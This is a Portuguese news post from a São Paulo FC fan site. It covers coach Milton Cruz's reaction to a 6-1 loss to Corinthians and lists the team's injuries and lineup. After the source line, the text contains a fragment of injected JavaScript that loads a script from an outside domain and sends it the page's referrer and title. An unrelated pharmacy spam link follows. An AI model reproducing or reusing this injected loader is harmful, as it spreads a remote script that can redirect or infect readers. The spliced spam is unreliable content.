Noticias

“Indignado”

“Foi um jogo atípico, nada deu certo. Estávamos bem no jogo, mas depois que tomamos o primeiro gol, demos uma bobeada. Tivemos dificuldade na bola parada. Esse foi o tema do jogo. Faltou a liderança do Ceni, o Ganso que sentiu a lesão e o Luis Fabiano que teve um incômodo na perna”. As palavras do técnico interino Milton Cruz, durante a coletiva de imprensa, resumem o clássico deste domingo (22) contra o Corinthians (6 x 1) pela 36ª rodada do Campeonato Brasileiro.

Diante de um adversário que soube aproveitar as oportunidades, o São Paulo não conseguiu repetir a boa atuação da última quinta-feira (19) – na goleada sobre o Atlético-MG (4 x 2) – e acabou derrotado. “O São Paulo é um time vitorioso. Essas coisas acontecem, uma derrota como essa acontece, mas é claro que não gostaria de passar por isso”, acrescentou o comandante.

Para encarar os corintianos neste final de semana, Milton Cruz não pôde contar com o atacante Alexandre Pato (questões contratuais). Além do camisa 11, o goleiro Rogério Ceni (ruptura do ligamento tíbio-fibular do pé direito), o zagueiro Breno (artroscopia no joelho direito) e o defensor Luiz Eduardo (artroscopia no joelho esquerdo) também estavam fora de combate. O trio segue entregue aos cuidados do REFFIS, realizando as atividades sempre em período integral (manhã e tarde), para poder ficar novamente à disposição.

De última hora, Renan Ribeiro, com uma tendinite no posterior da coxa esquerda, e Paulo Henrique Ganso, com um desconforto no músculo adutor da coxa direita, também desfalcaram o Tricolor, que desta forma começou a partida com Denis; Bruno, Rodrigo Caio, Lucão e Carlinhos; Hudson, Thiago Mendes e Wesley; Michel Bastos, Rogério e Alan Kardec.

Quando a bola rolou, o Tricolor até assustou primeiro e procurou o campo de ataque, mas os donos da casa souberam envolver os visitantes para levarem a melhor. “A gente fica indignado, não só eu como o jogador no vestiário. Os jogadores tentaram buscar o resultado, tivemos um jogo na quinta-feira que talvez tenha desgastado o grupo. O time começou bem, faltou a liderança do Rogério Ceni para orientar. O Ganso é um líder técnico. Essas coisas são difíceis de digerir, mas o futebol prega essas frustrações”, finalizou o treinador interino.

Fonte: SiteOficials.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; to order cheat generic pills online – http://www.duncanmazda.net/uncategorized/to-order-cheat-generic-pills-online/ pills

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

vinte + dezessete =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Noticias

Mais em Noticias

Fora! Pato encaminha rescisão de contrato com o São Paulo e se despede do elenco

saopauloadmin19 de agosto de 2020

10 fatos que orgulham todos os torcedores do São Paulo

saopauloadmin9 de julho de 2020

Dodô diz que quando jogou no são Paulo recusou ofertas do Barça e Inter de Milão

saopauloadmin16 de junho de 2020

São Paulo reforça posição contra o racismo: ‘Vidas negras importam’

saopauloadmin1 de junho de 2020

Osorio fala sobre saída do São Paulo em 2015

saopauloadmin31 de maio de 2020

Osorio diz ter saudade do São Paulo e coloca volta ao Brasil como um de seus 3 objetivos

saopauloadmin29 de maio de 2020

Luis Fabiano revela desejo em voltar a jogar, mas diz que está “pronto para parar”

saopauloadmin22 de maio de 2020

Diniz critica afobação por retorno aos treinos: “Ninguém joga sozinho”

saopauloadmin20 de maio de 2020

Com “combo”, São Paulo renova patrocínios

saopauloadmin10 de maio de 2020